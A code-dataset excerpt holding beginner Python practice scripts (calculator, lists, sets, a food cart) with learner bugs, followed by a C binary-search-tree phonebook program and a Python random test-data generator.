"repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "data = [1, 2, 3, 4, 5]\r\nprint(len(data))\r\nprint(max(data))\r\nprint(min(data))\r\n\r\n\r\ndef mylen(data):\r\n length = 0\r\n return length\r\n\r\ndef mymax(data):\r\n max = 0\r\n return mymax\r\n\r\ndef mymin(data):\r\n min = 0\r\n return mymin\r\n\r\n\r\n# List Comprehension\r\n\r\nprint([x**2 for x in data])\r\n\r\n\r\nproductprices = [1241, 2654, 1793, 7954, 4615]\r\n#list comprehensions and expressions : ERROR\r\n\r\nprint([x = x - 0.4*x, for x in productprices])\r\n\r\nnumbers = list(range(1, 101))\r\nprint(numbers)\r\n\r\nnames1 = (\"John\", \"Jennie\", \"Jim\", \"John\", \"Jack\")\r\nnames2 = list(names1)\r\nnames3 = set(names1)\r\n# names4 = dict(names1) | Error\r\n\r\nprint(names1, type(names1))\r\nprint(names2, type(names2))\r\nprint(names3, type(names3))\r\n\r\n" }, { "alpha_fraction": 0.4375, "alphanum_fraction": 0.48355263471603394, "avg_line_length": 17.09677505493164, "blob_id": "f44082e69db9128f375bbf94a377cb61047fe8fe", "content_id": "1195a580dda8d11b98b6517069ee923b1c56faf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 48, "num_lines": 31, "path": "/calculator.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "def add(plus):\r\n plus = num1 + num2\r\n print(\">> num1 + num2 = \", plus )\r\n\r\n\r\ndef sub(minus):\r\n minus = num1 - num2\r\n print(\">> num1 + num2 = \", minus)\r\n\r\n\r\ndef multiply(product):\r\n product = num1 * num2\r\n print(\">> num1 + num2 = \", product)\r\n\r\n\r\ndef divide(div):\r\n if num1 > num2 :\r\n div = num1 / num2\r\n print(\">> num1 / num2 = \", div)\r\n else:\r\n div = num2 / num1\r\n print(\">> num2 / num1 = \",div)\r\n\r\n\r\nnum1 = float(input(\">> ENTER NUMBER 1 :\", num1))\r\nnum2 = float(input(\">> ENTER NUMBER 2 :\", num2))\r\n\r\nadd()\r\nsub()\r\nmultiply()\r\ndivide()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.6430976390838623, "alphanum_fraction": 0.6540403962135315, "avg_line_length": 17.47541046142578, "blob_id": "c3f68ad7277f0bdcfd5a6e3b76b8595fec0240d3", "content_id": "54b9511a7dd92625335c77f086da004c856a9be8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1188, "license_type": "no_license", "max_line_length": 98, "num_lines": 61, "path": "/session7A.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "\"\"\"\r\nsequences in python\r\nsequence : data with quite similar type\r\n\r\nsequences listed below is also known as built in DS here in python\r\n\r\nWhy data is to be Structured ?\r\n1. Sort\r\n2. Search\r\n3. Filter\r\nPS :\r\n\"\"\"\r\n\r\nstudents = [\"John\", \"Jennie\", \"Jim\", \"Jack\", \"Joe\"]\r\nprint(students, id(students))\r\nprint(type(students))\r\n# CONCATENATION | IMMUTABLE\r\nnewstudents = (students + [\"Fionna\", \"George\"])\r\nprint(newstudents, id(newstudents))\r\n\r\nprint(students, id(students))\r\nprint(newstudents, id(newstudents))\r\n\r\nstudents = (students + [\"Fionna\", \"George\"])\r\nprint(students, id(students))\r\n\r\nprint()\r\n\"\"\"\r\n# REPETITION\r\n\r\nprint(students*2) # new tuple\r\n\r\n# MEMBERSHIP TESTING\r\n\r\nprint(\"John\" in students)\r\nprint(\"Dave\" not in students)\r\n\r\n\r\n# INDEXING\r\n\r\nprint(students[0])\r\nprint(students[len(students-1)])\r\n\r\n# SLICING\r\n\r\nprint(students[0:2]) # picking items from a range where 0 is inclusive and 2 is not\r\nfilteredstudents = students[1:4]\r\nprint(filteredstudents)\r\n\r\nprint()\r\n\r\n# basic for loop\r\n# for i in range(0, len(students)):\r\n# print(student[i])\r\n\r\n\r\n# Enhanced version for loop | for-each loop\r\n\r\nfor student in students:\r\n print[student]\r\n\"\"\"\r\n" }, { "alpha_fraction": 0.5674740672111511, "alphanum_fraction": 0.5743944644927979, "avg_line_length": 22.08333396911621, "blob_id": "131ff8e96785d0f85965870506a0d3c8b39d9605", "content_id": "ac3a18a3d3fa08c40eb16db3afe0592cce0ebfae", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 289, "license_type": "no_license", "max_line_length": 79, "num_lines": 12, "path": "/session6c.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "# something like pass by value but there is only pass by reference | as value\r\n\r\n\r\ndef square(num):\r\n num = num * num\r\n print(\">> [square] num is :\", num, id(num))\r\n\r\n\r\nnum = 10\r\nprint(\">> [main] num is:\", num, id(num))\r\nsquare(num)\r\nprint(\">> [main] num now is:\", num, id(num))\r\n" }, { "alpha_fraction": 0.4472573697566986, "alphanum_fraction": 0.4810126721858978, "avg_line_length": 17.75, "blob_id": "1d07b4806f35e0f87e4ac773689a8fa45712f9b3", "content_id": "613d2123c8085dc826cea22fa35a3b0a4270798e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 237, "license_type": "no_license", "max_line_length": 45, "num_lines": 12, "path": "/session5B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "# iterations and loops\r\nnum = int(input(\"enter a num:\"))\r\ni = 1\r\n\r\nwhile i<= 10:\r\n print(num, \"\", i, \"is equal to\", (num*i))\r\n i+=1\r\n\r\nprint(\">>>><<<<\")\r\n\r\nfor i in range(10, 0, -1):\r\n print(num, \"\", i, \"is equal to\", (num*i))\r\n" }, { "alpha_fraction": 0.6647887229919434, "alphanum_fraction": 0.6647887229919434, "avg_line_length": 23.35714340209961, "blob_id": "6f712d86826acdf0ea506c53901dd32f102ffff2", "content_id": "26df161250aaf3ed6c00bea7404b79086c8370b6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 355, "license_type": "no_license", "max_line_length": 51, "num_lines": 14, "path": "/session7B.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "students = {\"John\", \"Jennie\", \"Jim\", \"Jack\", \"Joe\"}\r\nprint(students, id(students))\r\nprint(type(students))\r\n\r\nnewstudents = (students + {\"Fionna\", \"George\"})\r\nprint(newstudents, id(newstudents))\r\n\r\nprint(students, id(students))\r\nprint(newstudents, id(newstudents))\r\n\r\nstudents = (students + {\"Fionna\", \"George\"})\r\nprint(students, id(students))\r\n\r\nprint()\r\n" }, { "alpha_fraction": 0.5326433181762695, "alphanum_fraction": 0.566082775592804, "avg_line_length": 22.115385055541992, "blob_id": "bd3e34aae0f501680a3d4945c38de664c69b9229", "content_id": "02c8498e1aacfbba950773677bdf4687489110a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1256, "license_type": "no_license", "max_line_length": 95, "num_lines": 52, "path": "/session7E.py", "repo_name": "thaparudita/Python_Basics", "src_encoding": "UTF-8", "text": "menu = {\r\n \"roti = 20\",\r\n \"paneer = 200\",\r\n \"dal = 100\",\r\n \"salad = 10\",\r\n}\r\n\r\ncart = []\r\nprint(cart, type(cart), len(cart))\r\n\r\nchoice = \"yes\"\r\n\r\nwhile choice == \"yes\":\r\n\r\n foodItem = input(\"enter a food item : \")\r\n cart.append(foodItem)\r\n choice = input(\"would like to add more items (yes/no) : \")\r\n\r\nprint(cart)\r\ntotalPrice = 0\r\nfor item in cart:\r\n totalPrice = totalPrice + menu[item]\r\n if amount > 200 and promoCode == \"Zomato\":\r\n amount = amount - (0.4 * amount)\r\n print(\">> Promo Code Zomato Applied Successfully. 40% OFF. Please Pay: \\u20b9\", amount)\r\n\r\n elif amount > 100 and promoCode == \"JUMBO\":\r\n\r\n discount = 0.5 * amount\r\n # Nested if/else\r\n if discount > 150:\r\n amount -= 150\r\n else:\r\n amount -= discount\r\n\r\n print(\">> Promo Code JUMBO Applied Successfully. 50% OFF. Please Pay: \\u20b9\", amount)\r\n\r\n else:\r\n print(\">> No Promo Code Found and no Discount Available\")\r\n print(\">> Please Pay: \\u20b9\", amount)\r\n\r\nprint(\"total price :\", totalPrice)\r\npromoCode = input(\"enter a promocode : \")\r\n\r\ncart.extend([\"salad\", \"noodles\"])\r\n\r\nprint(\"surprises in cart\", cart)\r\n\r\ncart.insert(1, \"soya champ\")\r\n\r\ncart.pop(2)\r\nprint(cart)\r\n\r\n" } ]
12
dzulaiman/binarysearch
https://github.com/dzulaiman/binarysearch
690133b19c275c4ede42505dda65993620f44438
1583356b0812918b1baed91aab54b2062e5b6240
53c3da09b77669fe7eb8085587246ce812603ed8
refs/heads/master
2020-06-02T08:59:31.568540
2013-04-19T02:52:29
2013-04-19T02:52:29
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6134805679321289, "alphanum_fraction": 0.6188119053840637, "avg_line_length": 25.775510787963867, "blob_id": "ec0d725df9f8f445bc812b88d493676ca619187e", "content_id": "0ddad682dc110717fb301f60a7498430e4613258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2626, "license_type": "no_license", "max_line_length": 65, "num_lines": 98, "path": "/Ph1tree.h", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "\n/*\n * File Name: Ph1tree.h\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March 28, 2013\n *\n * This is the interface file for the tree module. It \n * includes the constants, types, and function prototypes. \n * Documentation on how the function prototypes should be \n * used by a main program are included.\n */\n \n /* begin header file \"wrap\" */\n #ifndef _h5tree_h\n #define _h5tree_h\n \n #define MAX_NAME 30 /* maximum name length */\n \n typedef int treeKeyT;\n \n /* tree value data structure */\n typedef struct {\n char name[MAX_NAME+1]; /* one extra for null character */\n int number; /* the telephone number */\n } treeValueT;\n \n /* tree element data structure */\n typedef struct {\n treeKeyT key;\n treeValueT value;\n } treeElementT;\n \n typedef struct treeCDT *treeADT;\n \n /*\n * Function: TreeCreate\n * Usage: tree = TreeCreate();\n * ---------------------------\n * This procedure creates and initializes the root tree node.\n */\n treeADT TreeCreate(void);\n \n /*\n * Function: TreeDestroy\n * Usage: TreeDestroy(tree);\n * -------------------------\n * This procedure deallocates the memory used up by a tree.\n */\n void TreeDestroy(treeADT tree);\n \n /*\n * Function: TreeAdd\n * Usage: TreeAdd(tree,element);\n * -----------------------------\n * This procedure adds an element to the tree.\n */\n void TreeAdd(treeADT tree, treeElementT element);\n \n /*\n * Function: TreeDelete\n * Usage: element = TreeDelete(tree,key);\n * ----------------------------\n * This procedure deletes an element from a tree and returns it.\n */\n treeElementT TreeDelete(treeADT tree, treeKeyT key);\n \n /*\n * Function: TreeFind\n * Usage: found = TreeFind(tree,key);\n * ----------------------------------\n * This procedure attempts to find an element in the tree\n * with a corresponding key. If found, it returns a pointer\n * to that element. If not, it returns NULL.\n */\n treeElementT *TreeFind(treeADT tree, treeKeyT key);\n \n /*\n * Function: TreePrint\n * Usage: TreePrint(tree,outfileP);\n * --------------------------------\n * This procedure prints out the elements of a tree\n * using preorder traversal.\n */\n void TreePrint(treeADT tree, FILE *outfileP);\n \n /*\n * Function: PrintElement\n * Usage: PrintElement(element,outfileP);\n * --------------------------------------\n * PrintElement is not defined here in the tree module, it is\n * only prototyped here. It must be defined in the main program\n * to be used by TreePrint in the implementation module.\n */\n void PrintElement(treeElementT element, FILE *outfileP);\n \n /* end header file \"wrap\" */\n #endif\n\n" }, { "alpha_fraction": 0.5388683080673218, "alphanum_fraction": 0.5547329187393188, "avg_line_length": 24.554054260253906, "blob_id": "ae3553390d8cfa34c8e8d4bab4a0a16afbe6c215", "content_id": "0d28bf22c182ab04a50ec86a0d29f02217915026", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1891, "license_type": "no_license", "max_line_length": 64, "num_lines": 74, "path": "/random_data_generator.py", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#Random intial data for binary tree\n#Output: %d %s %d\n#Given initial\n#[email protected]\n\nimport random\n\ndef random_int(sizesample):\n\n unique = []\n maximum = sizesample\n minimum = 1\n \n while(minimum<maximum+1):\n y = random.randrange(1,maximum+1)\n if y not in unique:\n unique.append(y)\n #Uncomment below to debug output x and y\n #print \"x :\", minimum, \"y :\", y\n minimum = minimum + 1\n\n return unique\n\ndef random_name(sizesamp):\n namefile = open(\"100names.txt\")\n nameread = namefile.readlines()\n name = ''.join(random.sample(nameread,sizesamp))\n name = name.strip(\"\\n\")\n return name\n\ndef random_phone():\n phone = ['1','2','3','4','5','6','7','8','9','0']\n #tel = [0,1] + phone\n tel = ''.join(random.sample(phone,7))\n return \"601\" + tel\n \n\nif __name__ == \"__main__\":\n\n print \"Generate random sample for node and names\\n\"\n \n samplecount = raw_input(\"How many samples to generate : \")\n sample = int(samplecount)\n \n number = random_int(sample)\n #names = random_name(sample)\n\n #Changelog in Python 2.7, no mode for 2 words, just a,w or r\n fileoutname = \"phonebook_random_\"+samplecount+\".txt\"\n fileout = open(fileoutname,\"a\")\n \n i = 1\n for num in number:\n num = str(num)\n name = random_name(1)\n phonenum = random_phone()\n outstring = num + \" \" + name + \" \" + phonenum\n print i, outstring\n fileout.write(outstring)\n fileout.write(\"\\n\")\n i = i + 1\n \n \"\"\"for num,name in zip(number,names):\n num = str(num)\n name = name.strip(\"\\n\")\n phonenum = random_phone()\n outstring = num + \" \" + name + \" \" + phonenum\n fileout.write(outstring)\n fileout.write(\"\\n\")\"\"\"\n \n fileout.close()\n \n print \"Output to file: \" + fileoutname\n" }, { "alpha_fraction": 0.654321014881134, "alphanum_fraction": 0.654321014881134, "avg_line_length": 19.25, "blob_id": "8915c01e9878b6a64e83d48a892826f405022a50", "content_id": "a13e099adb43a6acd1abe66e81fad68d9ce3ec64", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "no_license", "max_line_length": 47, "num_lines": 4, "path": "/README.md", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "binarysearch\n==================\n\nBinary Search Tree implementation in C language\n" }, { "alpha_fraction": 0.573904275894165, "alphanum_fraction": 0.582615077495575, "avg_line_length": 29.540616989135742, "blob_id": "559f670355532351fe02502669fa77adf1fa7957", "content_id": "e0b26d425fa8a8f26c10fbe8e2b50da53919c47e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 10906, "license_type": "no_license", "max_line_length": 90, "num_lines": 357, "path": "/PhBook1.c", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": " /* http://www.cs.bu.edu/faculty/homer/113/ */\n\n /*\n * File Name: PhBook1.c\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March 29, 2013\n *\n * This program utilizes a binary search tree to build and maintain\n * a small PhoneBook database. The serial numbers will serve as the\n * search keys for the binary search tree. Data will initially be\n * read from a file, and the user will be prompted with options\n * regarding what to do with the phonebook.\n */\n #include <stdio.h>\n #include <stdlib.h>\n #include \"Ph1tree.h\"\n //#include \"Ph1tree.c\"\n \n #define FNAME_MAX 50 /* maximum filename length */\n \n /*\n * TYPE DEFINITIONS\n */\n typedef treeElementT dataT;\n typedef treeKeyT serialNumT;\n \n /*\n * FUNCTION PROTOTYPES\n */\n void PrintInfoMainMenu(void);\n void InfoReadFromFile(treeADT tree);\n void InfoAdd(treeADT tree);\n void InfoUpdate(treeADT tree);\n void InfoDelete(treeADT tree);\n void InfoFind(treeADT tree);\n void InfoPrint(treeADT tree);\n \n /*\n * BEGIN MAIN PROGRAM\n */\n int main(void)\n {\n treeADT tree; /* tree holding the phonebook information */\n \n char choice[2]; /* main menu choice */\n \n /* create a tree to hold the info. */\n tree = TreeCreate();\n \n InfoReadFromFile(tree); /* read info from file */\n PrintInfoMainMenu(); /* print main menu */\n printf(\"Choice> \");\n scanf(\"%s\", choice);\n \n while (choice[0] != 'q')\n { \n switch (choice[0])\n { \n case 'a':\n InfoAdd(tree);\n break;\n case 'd':\n InfoDelete(tree);\n break;\n case 'f':\n InfoFind(tree);\n break;\n case 'u':\n InfoUpdate(tree);\n break;\n case 'p':\n InfoPrint(tree);\n break;\n default:\n printf(\"Error!! Invalid Selection.\\n\");\n break;\n }\n \n printf(\"\\n\\nPress Enter for Main Menu\\n\");\n getchar(); getchar();\n PrintInfoMainMenu(); /* print main menu */\n printf(\"\\nChoice> \"); /* prompts for next selection */\n scanf(\"%s\", choice); /* scans in choice */\n }\n \n printf(\"Bye! Thanks for using PhoneBook.\\n\"); /* Goodbye message */ \n \n TreeDestroy(tree);\n \n return 0;\n }\n /*\n * END MAIN PROGRAM\n */\n \n /*\n * Function: PrintInfoMainMenu\n * Usage: PrintInfoMainMenu();\n * ------------------------------\n * This procedure prints out the main menu options.\n */\n void PrintInfoMainMenu(void)\n {\n printf(\"--------- PhoneBook Data Inventory System V1.0--------\\n\");\t\n printf(\"Please choose one of the following operations by typing its\\n\");\n printf(\"letter and then pressing <Return>:\\n\\n\");\n printf(\" a) Add an User info to the database.\\n\");\n printf(\" d) Delete user from the database.\\n\");\n printf(\" f) Find user in the database.\\n\");\n printf(\" u) Update user info in the database.\\n\");\n printf(\" p) Print user database.\\n\");\n printf(\" q) Quit inventory.\\n\\n\");\n }\n \n /*\n * Function: InfoReadFromFile\n * Usage: InfoReadFromFile(tree);\n * ---------------------------------\n * This procedure reads in user data file and adds\n * the user data to a binary search tree.\n */\n void InfoReadFromFile(treeADT tree)\n {\n dataT data; /* data information */\n \n /* name of phonebook data file to be opened */\n //char filename[FNAME_MAX+1] = \"/home/yaree/phone/phonebook.in\";\n char filename[FNAME_MAX+1] = \"phonebook_50_start24.txt\";\n \n FILE *ifp; /* input file pointer */\n \n printf(\"Initial user data read from file:\\n\");\n printf(\"\\\"%s\\\"\\n\\n\",filename);\n \n /* attempt to open user data file for reading */\n ifp = fopen(filename, \"r\");\n \n /* print error message if unable to open data file */\n if (ifp == NULL)\n {\n printf(\"Error!! Unable to open phonebook database file.\\n\");\n exit(1); /* exit, returning error code */\n }\n else\n {\n /* if file successfully opened, loop to read in user data */\n while (fscanf(ifp,\"%d %s %d\", &data.key, data.value.name, &data.value.number) == 3)\n TreeAdd(tree,data); /* add user to tree */\n \n fclose(ifp); /* close input file */\n }\n }\n \n /*\n * Function: InfoAdd\n * Usage: InfoAdd(tree);\n * ------------------------\n * This procedure prompts a user for a serial number, name, and Telephone Number \n * and adds the user information to the binary search tree.\n */\n void InfoAdd(treeADT tree)\n {\n dataT data; /* user information */\n \n printf(\"Please enter the serial number: \");\n while (scanf(\"%d\",&data.key) == 0 || (data.key < 1) || (data.key > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Please enter the Serial number: \");\n }\n \n printf(\"Please enter the name: \");\n scanf(\"%s\",data.value.name);\n \n printf(\"Please enter the telephone number \");\n while (scanf(\"%d\",&data.value.number ) <= 0)\n {\n printf(\"Error!! Telephone Number is invalid.\\n\");\n printf(\"telephone number must be an integer.\\n\");\n printf(\"Please enter the telephone number: \");\n }\n \n TreeAdd(tree,data); /* add user data to tree */\n }\n \n /*\n * Function: InfoUpdate\n * Usage: InfoUpdate(tree);\n * ------------------------\n * This procedure prompts a user for a serial number, name, and Telephone Number \n * and updates the user information to the binary search tree.\n */\n void InfoUpdate(treeADT tree)\n {\n dataT data, /* user information */\n *acctP;\n printf(\"Please enter the serial number: \");\n while (scanf(\"%d\",&data.key) == 0 || (data.key < 1) || (data.key > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Please enter the Serial number: \");\n }\n \n /* check if user info exists in tree */\n acctP = TreeFind(tree,data.key);\n PrintElement(*acctP,stdout);\n \n printf(\"\\nPlease enter the name: \");\n scanf(\"%s\",data.value.name);\n \n printf(\"Please enter the telephone number \");\n while (scanf(\"%d\",&data.value.number ) <= 0)\n {\n printf(\"Error!! Telephone Number is invalid.\\n\");\n printf(\"telephone number must be an integer.\\n\");\n printf(\"Please enter the telephone number: \");\n }\n \n TreeAdd(tree,data); /* add user data to tree */\n }\n \n /*\n * Function: InfoDelete\n * Usage: InfoDelete(tree);\n * ---------------------------\n * This procedure prompts the user for an user info. It then\n * searches for the serial number in the tree. If it is found, it\n * will remove the user information from the tree and print it.\n * If not, it will just print an error message.\n */\n void InfoDelete(treeADT tree)\n {\n serialNumT serial_num; /* serial number */\n dataT data, /* user information */\n *acctP; /* pointer to a user info */\n \n printf(\"Enter serial number to be deleted: \");\n while (scanf(\"%d\",&serial_num) == 0 || (serial_num < 1) || (serial_num > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial Number must be an integer between 1 and 100000.\\n\");\n printf(\"Enter serial number of the user to be deleted: \");\n }\n \n /* check if user info exists in tree */\n acctP = TreeFind(tree,serial_num);\n \n /* if user info does not exist, print an error message */\n if (acctP == NULL)\n printf(\"Error!! Serial number \\\"%d\\\" does not exist in database.\\n\", serial_num);\n else\n {\n /* if user exists, delete it from the tree and print its information */\n data = TreeDelete(tree,serial_num); /* delete data from tree */\n printf(\"The following user information was deleted:\\n\");\n PrintElement(data,stdout); \n }\n }\n \n /*\n * Function: InfoFind\n * Usage: InfoFind(tree);\n * -------------------------\n * This procedure prompts the user for an serial number and\n * attempts to find it in the tree. If it is found, it will\n * print out the phonebook information. If not, it will just\n * print an error message.\n */\n void InfoFind(treeADT tree)\n {\n serialNumT serial_num; /* serial number */\n dataT *dataP; /* pointer to a user info */\n \n printf(\"Enter the serial number to be found: \");\n while (scanf(\"%d\",&serial_num) == 0 || (serial_num < 1) || (serial_num > 100000))\n {\n printf(\"Error!! Serial number is invalid.\\n\");\n printf(\"Serial number must be an integer between 1 and 100000.\\n\");\n printf(\"Enter the serial number to be found: \");\n }\n \n /* check if data exists in tree */\n dataP = TreeFind(tree,serial_num);\n \n if (dataP == NULL)\n printf(\"Error!! Serial number \\\"%d\\\" not found.\\n\", serial_num);\n else\n PrintElement(*dataP,stdout);\n }\n \n /*\n * Function: InfoPrint\n * Usage: InfoPrint(tree);\n * --------------------------\n * This procedure prompts the user whether to print the phonebook\n * database to the screen or to a file and then prints out each\n * user information using preorder traversal of the tree.\n */\n void InfoPrint(treeADT tree)\n {\n char choice[5]; /* string holding user's choice */\n \n FILE *ofp; /* output file pointer */\n \n printf(\"Please choose where the user information should\\n\");\n printf(\"be printed and hit <Return>:\\n\\n\");\n printf(\" s) Print to screen\\n\");\n printf(\" f) Print to file \\\"phonebook.out\\\"\\n\");\n printf(\" r) Return to Main Menu prompt.\\n\\n\");\n printf(\"Print Choice> \");\n scanf(\"%s\",choice);\n \n while (choice[0] != 'r')\n {\n switch (choice[0])\n {\n case 's':\n TreePrint(tree,stdout); /* print to the screen */\n return; /* exit function */\n case 'f':\n ofp = fopen(\"phonebook.out\", \"w\"); /* attempt to open file for writing */\n TreePrint(tree,ofp); /* print out tree elements to file */\n fclose(ofp); /* close output file */\n return; /* exit function */\n default:\n printf(\"Invalid selection.\\n\");\n break;\n }\n printf(\"\\nPrint Choice> \");\n scanf(\"%s\",choice);\n }\n }\n /*\n * Printing to \"phonebook.out\" should have been done automatically\n * as last thing program does. --TF\n */\n \n /*\n * Function: PrintElement\n * ----------------------\n * This procedure prints out the elements of the tree.\n */\n void PrintElement(dataT data, FILE *outfileP)\n { \n\n fprintf(outfileP,\"|Serial: %d\\t\", data.key);\n fprintf(outfileP,\"|Name: %s\\t\", data.value.name);\n fprintf(outfileP,\"|Telephone: %d\\t\\n\", data.value.number);\n \n /*fprintf(outfileP,\"Serial Number: %d\\n\", data.key);\n fprintf(outfileP,\"User Name: %s\\n\", data.value.name);\n fprintf(outfileP,\"Telephone Number: %d\\n\\n\", data.value.number);*/\n }\n \n" }, { "alpha_fraction": 0.5497402548789978, "alphanum_fraction": 0.5505099296569824, "avg_line_length": 31.617155075073242, "blob_id": "3faae8a519a896c34ce3fb92f7f40029c36a42a7", "content_id": "41aeabe193c5911359354ba19a6e878ca2743fe1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 15591, "license_type": "no_license", "max_line_length": 88, "num_lines": 478, "path": "/Ph1tree.c", "repo_name": "dzulaiman/binarysearch", "src_encoding": "UTF-8", "text": "/*\n * File Name: Ph1tree.c\n * Name: Asmatullah Yaree, Mohd Dzul Aiman, Nursuliza, Maryam Adinehnia\n * Assignment: 1\n * Problem: 1\n * Date: March April, 2013\n *\n * This is the implementation file for the tree module. It\n * contains the functions needed to perform tree operations.\n */\n \n #include <stdio.h>\n #include <stdlib.h>\n #include \"Ph1tree.h\"\n \n \n /* tree node data structure */\n typedef struct treeNodeTag {\n treeElementT element; /* tree element */\n struct treeNodeTag *left; /* left tree link */\n struct treeNodeTag *right; /* right tree link */\n } treeNodeT;\n \n /* treeCDT data structure */\n typedef struct treeCDT {\n treeNodeT *root;\n } treeCDT;\n \n /*\n * HELPER FUNCTION PROTOTYPES\n */\n static void RecTreePrint(treeNodeT *root, FILE *outfileP);\n static void RecTreeDestroy(treeNodeT *root);\n static treeNodeT *FindCurrentNode(treeADT tree, treeKeyT key);\n static treeNodeT *FindParentNode(treeADT tree, treeKeyT key);\n static treeNodeT *FindMaxNode(treeNodeT *root);\n \n /*\n * Function: TreeCreate\n * --------------------\n * This procedure initializes an empty tree by setting \n * the pointer to the root of the tree equal to NULL.\n */\n treeADT TreeCreate(void)\n {\n treeADT tree; /* pointer to a treeCDT */\n \n tree = (treeADT)malloc(sizeof(treeCDT));\n \n /* if allocation fails, print an error message and exit */\n if (tree == NULL) \n {\n fprintf(stderr,\"Insufficient memory for new tree.\\n\");\n exit(1); /* exit, returning error code. */\n }\n \n tree->root = NULL; /* initialize root pointer of the tree */\n return tree;\n }\n \n /*\n * Function: TreeDestroy\n * ---------------------\n * This procedure calls a recursive function to free the memory\n * used up by the tree nodes and resets the root pointer of the\n * tree to NULL.\n */\n void TreeDestroy(treeADT tree)\n {\n RecTreeDestroy(tree->root); /* start at root of tree */\n tree->root = NULL; /* reset root pointer to NULL */\n \n /* free structure which holds information about tree */\n free(tree);\n }\n \n /*\n * Function: RecTreeDestroy\n * ------------------------\n * This procedure uses a postorder traversal of the tree\n * and recursively calls itself to free the tree nodes in\n * a postorder manner so that links to other nodes are not\n * lost if the root is deleted.\n */\n static void RecTreeDestroy(treeNodeT *root)\n {\n if (root == NULL) /* base case to stop recursing */\n return;\n else\n {\n RecTreeDestroy(root->left); /* traverse left */\n RecTreeDestroy(root->right); /* traverse right */\n free(root); /* deallocate memory */\n }\n }\n \n /*\n * Function: TreeAdd\n * -----------------\n * This procedure adds a new node to a tree to the \n * bottom of the tree. If the element is already in \n * the tree, it just adds the element.\n */\n void TreeAdd(treeADT tree, treeElementT element)\n {\n treeNodeT *new_tree_node, /* new tree node */\n *currentP, /* pointer to the current tree node */\n *parentP; /* pointer to parent of current node */\n\n \n /* check to see if element's key is already in the tree */\n currentP = FindCurrentNode(tree,element.key);\n \n /* if element's key is already in the tree, just */\n /* add the new element and exit the function */\n if (currentP != NULL)\n {\n printf(\"\\nUnfortunately, serial number already exist. Nothing was add.\");\n //currentP->element = element;\n return; /* exit the function */\n }\n \n /* if the element's key is not already in the tree, search for */\n /* an empty branch onto which the new leaf node will be added */\n \n parentP = NULL;\n currentP = tree->root; /* start at root of tree */\n \n /* search for empty branch to add an element */\n while (currentP != NULL)\n {\n parentP = currentP;\n if (element.key == currentP->element.key)\n break;\n else if (element.key < currentP->element.key)\n currentP = currentP->left;\n else if (element.key > currentP->element.key)\n currentP = currentP->right;\n }\n \n /* attempt to allocate space in memory for a new tree node */\n new_tree_node = (treeNodeT *) malloc(sizeof(treeNodeT));\n \n /* print error message if allocation fails */\n if (new_tree_node == NULL)\n {\n fprintf(stderr,\"Insufficient memory to add a new tree node.\\n\");\n TreeDestroy(tree);\n exit(1);\n }\n else\n {\n /* add the element to the new tree node */\n new_tree_node->element = element;\n new_tree_node->left = NULL;\n new_tree_node->right = NULL;\n \n /* connect the new tree node with the rest of the tree */\n /* depending on whether or not it is the root or it is */\n /* less than or greater than the root */\n if (parentP == NULL)\n tree->root = new_tree_node;\n else if (new_tree_node->element.key < parentP->element.key)\n parentP->left = new_tree_node;\n else if (new_tree_node->element.key > parentP->element.key)\n parentP->right = new_tree_node;\n }\n }\n \n /*\n * Function: TreeDelete\n * --------------------\n * This procedure deletes an element from a tree, depending\n * on whether the element is a leaf, has only one connecting\n * branch, or is a root node.\n */\n treeElementT TreeDelete(treeADT tree, treeKeyT key)\n {\n treeNodeT *currentP, /* pointer to node to be deleted */\n *parentP, /* pointer to parent of node to be deleted */\n *max_nodeP, /* pointer to node with largest key */\n *max_node_parP, /* pointer to parent of node with largest key */\n *temp_node;\n \n treeElementT deleted; /* element that is deleted from the tree */\n \n if (tree->root == NULL)\n {\n printf(\"Error!! There are no tree nodes to be deleted.\\n\");\n TreeDestroy(tree); /* deallocate memory used by tree */\n exit(1); /* exit program, returning error code */\n }\n else \n {\n /* find the node to be deleted */\n currentP = FindCurrentNode(tree,key);\n if (currentP == NULL)\n {\n printf(\"Error!! The key to be deleted does not exist in the tree.\\n\");\n TreeDestroy(tree); /* deallocate memory used by tree */\n exit(1); /* exit program, returning error code */\n }\n else \n {\n /* if the node exists, find it's parent node 